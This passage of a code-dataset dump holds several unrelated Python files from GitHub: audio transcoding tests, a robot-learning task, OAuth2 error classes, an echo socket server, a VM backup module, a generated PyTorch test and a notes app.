VECTOR.py","file_name":"FUNÇÃO RECURSIVA PARA PREENCHER VALORES DE UM VECTOR.py","file_ext":"py","file_size_in_byte":348,"program_lang":"python","lang":"pt","doc_type":"code","stars":1,"dataset":"github-code","pt":"71"} +{"seq_id":"27930627068","text":"#! /usr/bin/env python\n\nfrom __future__ import division\n\nfrom timeside.core.processor import get_processor, ProcessPipe\n#from timeside.plugins.decoder.file import FileDecoder\nfrom timeside.plugins.decoder.aubio import AubioDecoder as FileDecoder\n\nimport unittest\nfrom unit_timeside import TestRunner\nfrom tools import tmp_file_sink\nfrom timeside.core.tools.test_samples import samples\n\n@unittest.skip('skip for now')\nclass TestTranscodingStreaming(unittest.TestCase):\n \"Test transcoding and streaming\"\n\n def setUp(self):\n self.source = samples[\"sweep.wav\"]\n self.test_duration = True\n self.test_channels = True\n self.filesize_delta = None\n self.expected_sample_rate = None\n\n def testMp3(self):\n \"Test conversion to mp3\"\n self.encoder_id = 'mp3_encoder'\n self.filesize_delta = 156\n\n def testOgg(self):\n \"Test conversion to ogg\"\n self.encoder_id = 'vorbis_encoder'\n\n def testOpus(self):\n \"Test conversion to opus\"\n self.encoder_id = 'opus_encoder'\n self.expected_sample_rate = 48000\n\n def testWebM(self):\n \"Test conversion to webm\"\n self.encoder_id = 'webm_encoder'\n self.test_duration = False # webmmux encoder with streamable=true\n # does not return a valid duration\n\n def tearDown(self):\n decoder = FileDecoder(self.source)\n encoder_cls = get_processor(self.encoder_id)\n\n file_extension = '.' + encoder_cls.file_extension()\n\n self.target_filesink = tmp_file_sink(prefix=self.__class__.__name__,\n suffix=file_extension)\n\n self.target_appsink = tmp_file_sink(prefix=self.__class__.__name__,\n suffix=file_extension)\n\n encoder = encoder_cls(self.target_filesink, streaming=True)\n pipe = (decoder | encoder)\n\n\n with open(self.target_appsink, 'w') as f:\n for chunk in pipe.stream():\n f.write(chunk)\n \n decoder_encoded = FileDecoder(self.target_filesink)\n\n pipe2 = ProcessPipe(decoder_encoded)\n pipe2.run()\n \n\n import os\n filesink_size = os.path.getsize(self.target_filesink)\n appsink_size = os.path.getsize(self.target_appsink)\n\n os.unlink(self.target_filesink)\n os.unlink(self.target_appsink)\n #print decoder.channels(), decoder.samplerate(), written_frames\n #print media_channels\n\n if self.test_channels:\n self.assertEqual(decoder.channels(), decoder_encoded.channels())\n else:\n self.assertEqual(2, decoder_encoded.channels()) # voaacenc bug ?\n\n if not self.expected_sample_rate:\n self.expected_sample_rate = decoder.samplerate()\n self.assertEqual(self.expected_sample_rate,\n decoder_encoded.samplerate())\n\n if self.test_duration:\n self.assertAlmostEqual(decoder.input_duration,\n decoder_encoded.input_duration,\n delta=0.2)\n self.assertAlmostEqual(filesink_size, appsink_size,\n delta=self.filesize_delta)\n \nif __name__ == '__main__':\n unittest.main(testRunner=TestRunner())\n","repo_name":"yomguy/TimeSide","sub_path":"tests/test_transcoding_streaming.py","file_name":"test_transcoding_streaming.py","file_ext":"py","file_size_in_byte":3312,"program_lang":"python","lang":"en","doc_type":"code","stars":358,"dataset":"github-code","pt":"71"} +{"seq_id":"18855392719","text":"from typing import List, Tuple\n\nimport numpy as np\nfrom pyrep.objects.proximity_sensor import ProximitySensor\nfrom pyrep.objects.shape import Shape\nfrom rlbench.backend.conditions import (DetectedSeveralCondition,\n 
NothingGrasped, ConditionSet)\nfrom rlbench.backend.spawn_boundary import SpawnBoundary\nfrom rlbench.backend.task import Task\nfrom rlbench.const import colors\n\n\nclass BlockPyramid(Task):\n\n def init_task(self) -> None:\n self.blocks = [Shape('block_pyramid_block%d' % i) for i in range(6)]\n self.distractors = [Shape(\n 'block_pyramid_distractor_block%d' % i) for i in range(6)]\n success_detectors = [ProximitySensor(\n 'block_pyramid_success_block%d' % i) for i in range(3)]\n\n cond_set = ConditionSet([\n DetectedSeveralCondition(self.blocks, success_detectors[0], 3),\n DetectedSeveralCondition(self.blocks, success_detectors[1], 2),\n DetectedSeveralCondition(self.blocks, success_detectors[2], 1),\n NothingGrasped(self.robot.gripper)\n ])\n self.register_success_conditions([cond_set])\n self.register_graspable_objects(self.blocks + self.distractors)\n self.spawn_boundary = SpawnBoundary(\n [Shape('block_pyramid_boundary%d' % i) for i in range(4)])\n\n def init_episode(self, index: int) -> List[str]:\n\n color_name, color_rgb = colors[index]\n for obj in self.blocks:\n obj.set_color(color_rgb)\n\n color_choice = np.random.choice(\n list(range(index)) + list(range(index + 1, len(colors))),\n size=1, replace=False)[0]\n name, rgb = colors[color_choice]\n for obj in self.distractors:\n obj.set_color(rgb)\n self.spawn_boundary.clear()\n for ob in self.blocks + self.distractors:\n self.spawn_boundary.sample(\n ob, min_distance=0.08, min_rotation=(0.0, 0.0, -np.pi / 4),\n max_rotation=(0.0, 0.0, np.pi / 4))\n\n return ['stack %s blocks in a pyramid' % color_name,\n 'create a pyramid with the %s objects' % color_name,\n 'make a pyramid out of %s cubes' % color_name,\n 'position the %s blocks in the shape of a pyramid' % color_name,\n 'use the %s blocks to build a pyramid' % color_name]\n\n def variation_count(self) -> int:\n return len(colors)\n\n def base_rotation_bounds(self) -> Tuple[List[float], List[float]]:\n return [0, 0, - np.pi / 8], [0, 0, np.pi / 8]\n","repo_name":"stepjam/RLBench","sub_path":"rlbench/tasks/block_pyramid.py","file_name":"block_pyramid.py","file_ext":"py","file_size_in_byte":2552,"program_lang":"python","lang":"en","doc_type":"code","stars":839,"dataset":"github-code","pt":"71"} +{"seq_id":"35186302105","text":"\nfrom __future__ import annotations\nfrom typing import TYPE_CHECKING, ClassVar, Any\nif TYPE_CHECKING:\n from typing import Mapping\n from ..http.response import Response\n from .token import Token\n\nimport re\n\nfrom ..exceptions import ArgExcMixin\n\nclass ArgExc(ArgExcMixin):\n pass\n\n\nclass UnknownTokenType(ArgExc):\n \"\"\"An exception for when the client receives an unexpected token type.\n\n This exception class is provided for user code to raise.\n\n Typically the client will expect that the `token_type` field in a token\n response has the value `bearer`, and the token should be rejected if not.\n See `section 7.1`_ of the OAuth2 specification.\n\n .. _`section 7.1`: https://datatracker.ietf.org/doc/html/rfc6749#section-7.1\n \"\"\"\n\n def __init__(self, arg: object = None, *, token: Token) -> None:\n super().__init__(arg)\n self.token: Token = token\n\nclass OAuth2ResponseError(ArgExc):\n \"\"\"An OAuth2 response error as detailed in the OAuth2 spec.\n\n For more information see `section 5.2`_ of the OAuth2 specification.\n\n .. 
_`section 5.2`: https://tools.ietf.org/html/rfc6749#section-5.2\n \"\"\"\n ERROR_NAME: ClassVar[str] = ''\n\n def __init__(self, arg: object = None, *,\n error_name: str = '',\n description: str = '',\n help_uri: str = '') -> None:\n super().__init__(arg)\n self.error_name: str = error_name\n self.description: str = description\n self.help_uri: str = help_uri\n\n def get_default_message(self) -> str:\n if self.description:\n return repr(self.description)\n return ''\n\nclass TokenServerResponseError(OAuth2ResponseError):\n \"\"\"Error responses that from the token server.\"\"\"\n\nclass TokenServerResponseErrorTypes:\n class InvalidRequest(TokenServerResponseError):\n ERROR_NAME: ClassVar[str] = 'invalid_request'\n\n class InvalidClient(TokenServerResponseError):\n ERROR_NAME: ClassVar[str] = 'invalid_client'\n\n class InvalidGrant(TokenServerResponseError):\n ERROR_NAME: ClassVar[str] = 'invalid_grant'\n\n class UnauthorizedClient(TokenServerResponseError):\n ERROR_NAME: ClassVar[str] = 'unauthorized_client'\n\n class UnsupportedGrantType(TokenServerResponseError):\n ERROR_NAME: ClassVar[str] = 'unsupported_grant_type'\n\n class InvalidScope(TokenServerResponseError):\n ERROR_NAME: ClassVar[str] = 'invalid_scope'\n\nclass UnrecognizedTokenServerResponseError(TokenServerResponseError):\n pass\n\ntoken_server_response_error_by_error_name: Mapping[str, type[TokenServerResponseError]] = {\n cls.ERROR_NAME: cls\n for cls in [\n TokenServerResponseError,\n TokenServerResponseErrorTypes.InvalidRequest,\n TokenServerResponseErrorTypes.InvalidClient,\n TokenServerResponseErrorTypes.InvalidGrant,\n TokenServerResponseErrorTypes.UnauthorizedClient,\n TokenServerResponseErrorTypes.UnsupportedGrantType,\n TokenServerResponseErrorTypes.InvalidScope,\n ]\n}\n\ndef raise_for_token_server_response_error(json_dict: Any) -> None:\n error_name = json_dict.get('error')\n if error_name is None:\n return\n\n cls = token_server_response_error_by_error_name.get(error_name, UnrecognizedTokenServerResponseError)\n raise cls(\n error_name=error_name,\n description=json_dict.get('error_description', ''),\n help_uri=json_dict.get('error_uri', ''),\n )\n\nclass ResourceServerResponseError(OAuth2ResponseError):\n \"\"\"Error responses that from the resource server (i.e., the API).\"\"\"\n\nclass ResourceServerResponseErrorTypes:\n class InvalidRequest(ResourceServerResponseError):\n ERROR_NAME: ClassVar[str] = 'invalid_request'\n\n class InvalidToken(ResourceServerResponseError):\n ERROR_NAME: ClassVar[str] = 'invalid_token'\n\n class InsufficientScope(ResourceServerResponseError):\n ERROR_NAME: ClassVar[str] = 'insufficient_scope'\n\nclass UnrecognizedResourceServerResponseError(ResourceServerResponseError):\n pass\n\nresource_server_response_error_by_error_name: Mapping[str, type[ResourceServerResponseError]] = {\n cls.ERROR_NAME: cls\n for cls in [\n ResourceServerResponseError,\n ResourceServerResponseErrorTypes.InvalidRequest,\n ResourceServerResponseErrorTypes.InvalidToken,\n ResourceServerResponseErrorTypes.InsufficientScope,\n ]\n}\n\ndef raise_for_resource_server_response_error(json_dict: Any) -> None:\n error_name = json_dict.get('error')\n if error_name is None:\n return\n\n cls = resource_server_response_error_by_error_name.get(\n error_name, UnrecognizedResourceServerResponseError)\n raise cls(\n error_name=error_name,\n description=json_dict.get('error_description', ''),\n help_uri=json_dict.get('error_uri', ''),\n )\n\n_auth_param_pattern = 
r'''(?P(\\w+))=((?P\\\")(?P([^\\\"]*))(?P=q)|(?P=value))'''\n_auth_param_regex = re.compile(_auth_param_pattern)\n\ndef extract_www_authenticate_auth_params(resp: Response) -> Mapping[str, str]:\n try:\n www_authenticate = resp.headers['WWW-Authenticate']\n except KeyError:\n return {}\n\n # Parsing the WWW-Authenticate header in a RFC-2617 spec compliant way is a daunting task.\n # Just use regex for now.\n return {m['key']: m['value'] for m in _auth_param_regex.finditer(www_authenticate)}\n","repo_name":"Pyprohly/redditwarp","sub_path":"redditwarp/auth/exceptions.py","file_name":"exceptions.py","file_ext":"py","file_size_in_byte":5356,"program_lang":"python","lang":"en","doc_type":"code","stars":9,"dataset":"github-code","pt":"71"} +{"seq_id":"32643345574","text":"#!/usr/bin/env python3\nimport sys\nimport socket\nimport selectors\nimport types\n\n\"\"\"\nBaseSelector\n - SelectSelector : select.select()\n - PollSelector : select.poll()\n - EpollSelector : select.epoll()\n - DevpollSelector : select.devpoll()\n - KqueueSelector : select.kqueue()\n\nDefaultSelector: is an alias to the most efficient implementation available on the current platform\n\"\"\"\nsel = selectors.DefaultSelector()\n\n\ndef accept_wrapper(sock):\n conn, addr = sock.accept() # Should be ready to read\n print(f\"accepted {conn} from {addr}\")\n conn.setblocking(False) # configure the socket in non-blocking mode.\n data = types.SimpleNamespace(addr=addr, inb=b\"\", outb=b\"\")\n events = selectors.EVENT_READ | selectors.EVENT_WRITE\n # register(fileobj, events, data=None)\n sel.register(conn, events, data=data) # registers the socket to be monitored\n\n\ndef service_connection(key, mask):\n sock = key.fileobj # the socket object\n data = key.data\n if mask & selectors.EVENT_READ:\n recv_data = sock.recv(1024) # Should be ready to read\n if recv_data:\n data.outb += recv_data\n else:\n print(\"closing connection to\", data.addr)\n sel.unregister(sock)\n sock.close()\n if mask & selectors.EVENT_WRITE:\n if data.outb:\n print(\"echoing\", repr(data.outb), \"to\", data.addr)\n sent = sock.send(data.outb) # Should be ready to write\n data.outb = data.outb[sent:]\n\n\nif len(sys.argv) != 3:\n print(\"usage:\", sys.argv[0], \" \")\n sys.exit(1)\n\n\nhost, port = sys.argv[1], int(sys.argv[2])\nlsock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\nlsock.bind((host, port))\nlsock.listen()\nprint(\"listening on\", (host, port))\n# sock.setblocking(True) is equivalent to sock.settimeout(None)\n# sock.setblocking(False) is equivalent to sock.settimeout(0.0)\nlsock.setblocking(False)\n\n# Register a file object for selection, monitoring it for I/O events\nsel.register(lsock, selectors.EVENT_READ, data=None)\n\n\n# the event loop\ntry:\n while True:\n # blocks until there are sockets ready for I/O\n events = sel.select(timeout=None)\n for key, mask in events:\n if key.data is None:\n accept_wrapper(key.fileobj)\n else:\n service_connection(key, mask)\nexcept KeyboardInterrupt:\n print(\"caught keyboard interrupt, exiting\")\nfinally:\n sel.close()\n","repo_name":"chyidl/begin-again","sub_path":"docs/programming_language/python/src/sockets/multiconn-server.py","file_name":"multiconn-server.py","file_ext":"py","file_size_in_byte":2461,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"71"} +{"seq_id":"38946386709","text":"import arrow\nimport json\nimport libvirt\nimport logging\nimport lxml.etree\nimport os\nimport subprocess\nimport tarfile\n\nimport virt_backup\nfrom 
virt_backup.backups.packagers import ReadBackupPackagers, WriteBackupPackagers\nfrom virt_backup.compat_layers.pending_info import (\n convert as compat_convert_pending_info,\n)\nfrom virt_backup.domains import get_xml_block_of_disk\nfrom virt_backup.exceptions import CancelledError\nfrom virt_backup.tools import copy_file\nfrom . import _BaseDomBackup\nfrom .snapshot import DomExtSnapshot\n\n\nlogger = logging.getLogger(\"virt_backup\")\n\n\ndef build_dom_backup_from_pending_info(\n pending_info, backup_dir, conn, callbacks_registrer\n):\n compat_convert_pending_info(pending_info)\n kwargs = {\n \"dom\": conn.lookupByName(pending_info[\"domain_name\"]),\n \"backup_dir\": backup_dir,\n \"dev_disks\": tuple(pending_info.get(\"disks\", {}).keys()),\n \"callbacks_registrer\": callbacks_registrer,\n }\n if pending_info.get(\"packager\"):\n kwargs[\"packager\"] = pending_info[\"packager\"].get(\"type\")\n kwargs[\"packager_opts\"] = pending_info[\"packager\"].get(\"opts\", {})\n\n backup = DomBackup(**kwargs)\n backup.pending_info = pending_info\n\n return backup\n\n\nclass DomBackup(_BaseDomBackup):\n \"\"\"\n Libvirt domain backup\n \"\"\"\n\n def __init__(\n self,\n dom,\n backup_dir=None,\n dev_disks=None,\n packager=\"tar\",\n packager_opts=None,\n conn=None,\n timeout=None,\n disks=None,\n ext_snapshot_helper=None,\n callbacks_registrer=None,\n quiesce=False,\n ):\n \"\"\"\n :param dev_disks: list of disks dev names to backup. Disks will be\n searched in the domain to pull more informations, and\n an exception will be thrown if one of them is not\n found\n :param disks: dictionary of disks to backup, in this form:\n `{\"src\": disk_path, \"type\": disk_format}`. Prefer\n using dev disks when possible.\n \"\"\"\n super().__init__()\n\n #: domain to backup. Has to be a libvirt.virDomain object\n self.dom = dom\n\n #: directory where backups will be saved\n self.backup_dir = backup_dir\n\n #: disks to backups. If None, will backup every vm disks\n self.disks = {}\n if dev_disks:\n self.disks.update(self._get_self_domain_disks(*dev_disks))\n if disks:\n self.disks.update(self._get_self_domain_disks(*disks))\n if not self.disks:\n self.disks = self._get_self_domain_disks()\n\n #: string indicating how to compress the backups:\n # * None/dir: no compression, backups will be only copied\n # * \"tar\": backups will be packaged in a tarfile (compression available\n # through packager_opts)\n self.packager = packager or \"directory\"\n\n #: dict of packager options.\n self.packager_opts = dict(packager_opts) if packager_opts else {}\n\n #: libvirt connection to use. If not sent, will use the connection used\n # for self.domain\n self.conn = self.dom._conn if conn is None else conn\n\n #: timeout when waiting for the block pivot to end. Infinite wait if\n # timeout is None\n self.timeout = timeout\n\n #: quiesce enable the Livirt Quiesce options when taking the external snapshot.\n # It allows to freeze the filesystem before the snapshot, but requires qemu\n # guest agent to run inside the VM.\n self.quiesce = quiesce\n\n #: droppable helper to take and clean external snapshots. Can be\n # construct with an ext_snapshot_helper to clean the snapshots of an\n # aborted backup. Starting a backup will erase this helper.\n self._ext_snapshot_helper = ext_snapshot_helper\n\n #: used to redistribute events received by libvirt, as one event cannot\n # be registered for multiple times. 
Necessary if no\n # `ext_snapshot_helper` is given.\n self._callbacks_registrer = callbacks_registrer\n\n if not (ext_snapshot_helper or callbacks_registrer):\n raise AttributeError(\n \"callbacks_registrer needed if no ext_snapshot_helper is given\"\n )\n\n #: useful info collected during a pending backup, allowing to clean\n # the backup if anything goes wrong\n self.pending_info = {}\n\n #: store the backup name (usually generated with the internal format)\n self._name = \"\"\n\n #: Used as lock when the backup is already running\n self._running = False\n\n @property\n def running(self):\n return self._running\n\n def add_disks(self, *dev_disks):\n \"\"\"\n Add disk by dev name\n\n .. warning::\n\n Adding a disk during a backup is not recommended, as the current\n disks list could be inaccurate. It will pull the informations\n about the current disks attached to the domain, but the backup\n process creates temporary external snapshots, changing the current\n disks attached. This should not be an issue when the backingStore\n property will be correctly handled, but for now it is.\n\n :param dev_disk: dev name of the new disk to backup. If not indicated,\n will add all disks.\n \"\"\"\n dom_all_disks = self._get_self_domain_disks()\n if not dev_disks:\n self.disks = dom_all_disks\n for dev in dev_disks:\n if dev in self.disks:\n continue\n self.disks[dev] = dom_all_disks[dev]\n\n def cancel(self):\n self._cancel_flag.set()\n\n def start(self):\n \"\"\"\n Start the entire backup process for all disks in self.disks\n \"\"\"\n assert not self.running\n assert self.dom and self.backup_dir\n self._cancel_flag.clear()\n\n if not os.path.exists(self.backup_dir):\n os.mkdir(self.backup_dir)\n\n logger.info(\"%s: Backup started\", self.dom.name())\n definition = self.get_definition()\n definition[\"disks\"] = {}\n\n try:\n self._running = True\n self._ext_snapshot_helper = self._get_ext_snapshot_helper()\n\n snapshot_date, definition = self._snapshot_and_save_date(definition)\n\n self._name = self._main_backup_name_format(snapshot_date)\n definition[\"name\"], self.pending_info[\"name\"] = self._name, self._name\n self._dump_json_definition(definition)\n self._dump_pending_info()\n\n packager = self._get_packager()\n # TODO: handle backingStore cases\n with packager:\n for disk, prop in self.disks.items():\n if self._cancel_flag.is_set():\n raise CancelledError()\n\n self._backup_disk(disk, prop, packager, definition)\n self._ext_snapshot_helper.clean_for_disk(disk)\n\n self._dump_json_definition(definition)\n self.post_backup()\n self._clean_pending_info()\n except:\n self.clean_aborted()\n raise\n finally:\n self._running = False\n logger.info(\"%s: Backup finished\", self.dom.name())\n\n def _get_ext_snapshot_helper(self):\n return DomExtSnapshot(\n self.dom,\n self.disks,\n self._callbacks_registrer,\n self.conn,\n self.timeout,\n quiesce=self.quiesce,\n )\n\n def _get_packager(self):\n assert self._name, \"_name attribute needs to be defined to get a packager\"\n return self._get_write_packager(self._name)\n\n def _snapshot_and_save_date(self, definition):\n \"\"\"\n Take a snapshot of all disks to backup and mark date into definition\n\n All disks are frozen when external snapshots have been taken, so we\n consider this step to be the backup date.\n\n :return snapshot_date, definition: return snapshot_date as `arrow`\n type, and the updated definition\n \"\"\"\n snapshot_metadatas = self._ext_snapshot_helper.start()\n\n # all of our disks are snapshot, so the backup date is right now\n 
definition[\"date\"] = snapshot_metadatas[\"date\"].int_timestamp\n\n self.pending_info = definition.copy()\n self.pending_info[\"disks\"] = {\n disk: {\n \"src\": prop[\"src\"],\n \"snapshot\": snapshot_metadatas[\"disks\"][disk][\"snapshot\"],\n \"type\": snapshot_metadatas[\"disks\"][disk][\"type\"],\n }\n for disk, prop in self.disks.items()\n }\n self._dump_pending_info()\n\n return snapshot_metadatas[\"date\"], definition\n\n def get_definition(self):\n \"\"\"\n Get a json defining this backup\n \"\"\"\n return {\n \"domain_id\": self.dom.ID(),\n \"domain_name\": self.dom.name(),\n \"domain_xml\": self.dom.XMLDesc(),\n \"packager\": {\"type\": self.packager, \"opts\": self.packager_opts},\n \"version\": virt_backup.VERSION,\n }\n\n def _backup_disk(self, disk, disk_properties, packager, definition):\n \"\"\"\n Backup a disk and complete the definition by adding this disk\n\n :param disk: diskname to backup\n :param disk_properties: dictionary discribing our disk (typically\n contained in self.disks[disk])\n :param packager: a BackupPackager object\n :param definition: dictionary representing the domain backup\n \"\"\"\n snapshot_date = arrow.get(definition[\"date\"]).to(\"local\")\n logger.info(\"%s: Backup disk %s\", self.dom.name(), disk)\n bak_img = \"{}.{}\".format(\n self._disk_backup_name_format(snapshot_date, disk), disk_properties[\"type\"]\n )\n self.pending_info[\"disks\"][disk][\"target\"] = bak_img\n self._dump_pending_info()\n\n if definition.get(\"disks\", None) is None:\n definition[\"disks\"] = {}\n definition[\"disks\"][disk] = bak_img\n\n packager.add(disk_properties[\"src\"], bak_img, self._cancel_flag)\n\n def _disk_backup_name_format(self, snapdate, disk_name, *args, **kwargs):\n \"\"\"\n Backup name format for each disk when no compression/compacting is set\n\n :param snapdate: date when external snapshots have been created\n :param disk_name: disk name currently being backup\n \"\"\"\n return \"{}_{}\".format(self._main_backup_name_format(snapdate), disk_name)\n\n def post_backup(self):\n \"\"\"\n Post backup process\n\n Unregister callback and close backup_target if is tarfile\n \"\"\"\n if self._ext_snapshot_helper is not None:\n self._ext_snapshot_helper.clean()\n self._ext_snapshot_helper = None\n self._running = False\n\n def _parse_dom_xml(self):\n \"\"\"\n Parse the domain's definition\n \"\"\"\n return lxml.etree.fromstring(\n self.dom.XMLDesc(), lxml.etree.XMLParser(resolve_entities=False)\n )\n\n def _dump_json_definition(self, definition):\n \"\"\"\n Dump the backup definition as json\n\n Definition will describe our backup, with the date, backuped\n disks names and other informations\n \"\"\"\n backup_date = arrow.get(definition[\"date\"]).to(\"local\")\n definition_path = self._get_json_definition_path(backup_date)\n with open(definition_path, \"w\") as json_definition:\n json.dump(definition, json_definition, indent=4)\n\n def _clean_definition(self, definition={}):\n backup_date = arrow.get(definition.get(\"date\", self.pending_info[\"date\"])).to(\n \"local\"\n )\n os.remove(self._get_json_definition_path(backup_date))\n\n def _get_json_definition_path(self, backup_date):\n return os.path.join(\n self.backup_dir,\n \"{}.{}\".format(self._main_backup_name_format(backup_date), \"json\"),\n )\n\n def _dump_pending_info(self):\n \"\"\"\n Dump the temporary changes done, as json\n\n Useful\n \"\"\"\n json_path = self._get_pending_info_json_path()\n with open(json_path, \"w\") as json_pending_info:\n json.dump(self.pending_info, json_pending_info, 
indent=4)\n\n def _clean_pending_info(self):\n os.remove(self._get_pending_info_json_path())\n self.pending_info = {}\n\n def _get_pending_info_json_path(self):\n backup_date = arrow.get(self.pending_info[\"date\"]).to(\"local\")\n json_path = os.path.join(\n self.backup_dir,\n \"{}.{}.pending\".format(self._main_backup_name_format(backup_date), \"json\"),\n )\n return json_path\n\n def clean_aborted(self):\n is_ext_snap_helper_needed = (\n not self._ext_snapshot_helper and self.pending_info.get(\"disks\", None)\n )\n if is_ext_snap_helper_needed:\n self._ext_snapshot_helper = self._get_ext_snapshot_helper()\n self._ext_snapshot_helper.metadatas = {\n \"disks\": {\n disk: {\n \"src\": val[\"src\"],\n \"snapshot\": val[\"snapshot\"],\n \"type\": val[\"type\"],\n }\n for disk, val in self.pending_info[\"disks\"].items()\n }\n }\n\n if self._ext_snapshot_helper:\n self._ext_snapshot_helper.clean()\n\n # If the name couldn't have been written, no packager has been created.\n if \"name\" in self.pending_info:\n packager = self._get_write_packager(self.pending_info[\"name\"])\n try:\n targets = []\n for d in self.pending_info[\"disks\"].values():\n if \"target\" in d:\n targets.append(d[\"target\"])\n\n self._clean_packager(packager, targets)\n except FileNotFoundError:\n logger.info(\n \"%s: Packager not found, nothing to clean.\", self.dom.name()\n )\n\n if \"date\" in self.pending_info:\n for cleaning in (self._clean_definition, self._clean_pending_info):\n try:\n cleaning()\n except FileNotFoundError:\n # Info had no time to be filled, so had not be dumped.\n pass\n\n def compatible_with(self, dombackup):\n \"\"\"\n Is compatible with dombackup ?\n\n If the target is the same for both dombackup and self, same thing for\n packager and packager_opts, self and dombackup are considered\n compatibles.\n \"\"\"\n same_domain = dombackup.dom.UUID() == self.dom.UUID()\n if not same_domain:\n return False\n\n attributes_to_compare = (\"backup_dir\", \"packager\")\n for a in attributes_to_compare:\n if getattr(self, a) != getattr(dombackup, a):\n return False\n\n # compare the packager_opts by converting them to json and diffing the strings\n same_package_opts = json.dumps(\n self.packager_opts, sort_keys=True\n ) == json.dumps(dombackup.packager_opts, sort_keys=True)\n if not same_package_opts:\n return False\n\n return True\n\n def merge_with(self, dombackup):\n self.add_disks(*dombackup.disks.keys())\n timeout = self.timeout or dombackup.timeout\n self.timeout = timeout\n","repo_name":"aruhier/virt-backup","sub_path":"virt_backup/backups/pending.py","file_name":"pending.py","file_ext":"py","file_size_in_byte":15506,"program_lang":"python","lang":"en","doc_type":"code","stars":95,"dataset":"github-code","pt":"71"} +{"seq_id":"30190641242","text":"import sys\n_module = sys.modules[__name__]\ndel sys\ndataset = _module\ndataset = _module\nmake_training_data = _module\ndomains = _module\ngridworld = _module\ngenerators = _module\nobstacle_gen = _module\nmodel = _module\ntest = _module\ntrain = _module\nutility = _module\nutils = _module\n\nfrom _paritybench_helpers import _mock_config, patch_functional\nfrom unittest.mock import mock_open, MagicMock\nfrom torch.autograd import Function\nfrom torch.nn import Module\nimport abc, collections, copy, enum, functools, inspect, itertools, logging, math, matplotlib, numbers, numpy, pandas, queue, random, re, scipy, sklearn, string, tensorflow, time, torch, torchaudio, torchtext, torchvision, types, typing, uuid, warnings\nimport numpy as np\nfrom torch import 
Tensor\npatch_functional()\nopen = mock_open()\nyaml = logging = sys = argparse = MagicMock()\nArgumentParser = argparse.ArgumentParser\n_global_config = args = argv = cfg = config = params = _mock_config()\nargparse.ArgumentParser.return_value.parse_args.return_value = _global_config\nyaml.load.return_value = _global_config\nsys.argv = _global_config\n__version__ = '1.0.0'\nxrange = range\nwraps = functools.wraps\n\n\nimport numpy as np\n\n\nimport torch\n\n\nimport torch.utils.data as data\n\n\nimport torch.nn as nn\n\n\nimport torch.nn.functional as F\n\n\nimport torch.optim as optim\n\n\nfrom torch.nn.parameter import Parameter\n\n\nimport matplotlib.pyplot as plt\n\n\nfrom torch.autograd import Variable\n\n\nimport time\n\n\nimport torchvision.transforms as transforms\n\n\nclass VIN(nn.Module):\n\n def __init__(self, config):\n super(VIN, self).__init__()\n self.config = config\n self.h = nn.Conv2d(in_channels=config.l_i, out_channels=config.l_h, kernel_size=(3, 3), stride=1, padding=1, bias=True)\n self.r = nn.Conv2d(in_channels=config.l_h, out_channels=1, kernel_size=(1, 1), stride=1, padding=0, bias=False)\n self.q = nn.Conv2d(in_channels=1, out_channels=config.l_q, kernel_size=(3, 3), stride=1, padding=1, bias=False)\n self.fc = nn.Linear(in_features=config.l_q, out_features=8, bias=False)\n self.w = Parameter(torch.zeros(config.l_q, 1, 3, 3), requires_grad=True)\n self.sm = nn.Softmax(dim=1)\n\n def forward(self, X, S1, S2, config):\n h = self.h(X)\n r = self.r(h)\n q = self.q(r)\n v, _ = torch.max(q, dim=1, keepdim=True)\n for i in range(0, config.k - 1):\n q = F.conv2d(torch.cat([r, v], 1), torch.cat([self.q.weight, self.w], 1), stride=1, padding=1)\n v, _ = torch.max(q, dim=1, keepdim=True)\n q = F.conv2d(torch.cat([r, v], 1), torch.cat([self.q.weight, self.w], 1), stride=1, padding=1)\n slice_s1 = S1.long().expand(config.imsize, 1, config.l_q, q.size(0))\n slice_s1 = slice_s1.permute(3, 2, 1, 0)\n q_out = q.gather(2, slice_s1).squeeze(2)\n slice_s2 = S2.long().expand(1, config.l_q, q.size(0))\n slice_s2 = slice_s2.permute(2, 1, 0)\n q_out = q_out.gather(2, slice_s2).squeeze(2)\n logits = self.fc(q_out)\n return logits, self.sm(logits)\n\n","repo_name":"eladhoffer/pytorch-jit-paritybench","sub_path":"generated/test_kentsommer_pytorch_value_iteration_networks.py","file_name":"test_kentsommer_pytorch_value_iteration_networks.py","file_ext":"py","file_size_in_byte":3040,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"71"} +{"seq_id":"30215359650","text":"def chr_n_gram(s: str, n: int):\n return [s[i:i+n] for i in range(len(s) - n + 1)]\n\ndef main():\n s1 = \"paraparaparadise\"\n s2 = \"paragraph\"\n res1 = chr_n_gram(s1, 2)\n res1 = set(res1)\n res2 = chr_n_gram(s2, 2)\n res2 = set(res2)\n print(\"Union\", res1 | res2)\n print(\"Intersection\", res1 & res2)\n print(\"Difference\", res1 - res2)\n\n print(\"'se' in s1: \", \"se\" in res1)\n print(\"'se' in s2: \", \"se\" in res2)\n\nif __name__ == \"__main__\":\n main()","repo_name":"Percy08-dev/NLP_100problems","sub_path":"準備運動/06.py","file_name":"06.py","file_ext":"py","file_size_in_byte":474,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"71"} +{"seq_id":"37241177056","text":"from Views.GetMenu import printMenu\nfrom Mechanisms.NoteOfMechanisms import NoteOfMechanisms\nfrom Models.JsonNote import JsonModel\nfrom Views.GetNote import View\nfrom Models.Note import Note\n\nimport datetime\n\n\ndef startMenu():\n \"\"\"\n Основная функция запуска 
программы.\n :return:\n \"\"\"\n c = NoteOfMechanisms(JsonModel(\"notes.json\"), View())\n while (True):\n print('Программа заметки:')\n printMenu()\n task = ''\n try:\n task = int(input('Введите от 1 до 7: '))\n except:\n print('Неверно введено число от 1 до 7')\n raise\n \n if task == 1: # Проверка введённого числа и запуск функции в основном фаиле\n print('\\nСоздание заметки.')\n c.create_note(get_note_data())\n elif task == 2:\n print('\\nПоказанть заметку.')\n if c.notes_exist():\n c.show_note(int(get_number()))\n elif task == 3:\n if c.notes_exist():\n print('\\nПоказать все заметки.')\n c.show_notes()\n elif task == 4:\n if c.notes_exist():\n print('\\nРедактировать заметку.')\n updated_id = int(get_number())\n if c.note_id_exist(updated_id):\n c.update_note(updated_id, get_note_data())\n elif task == 5:\n if c.notes_exist():\n print('\\nУдалить заметку!')\n delete_id = int(get_number())\n if c.note_id_exist(delete_id):\n c.delete_note(delete_id)\n elif task == 6:\n if c.notes_exist():\n print('Удалить все заметки!')\n if 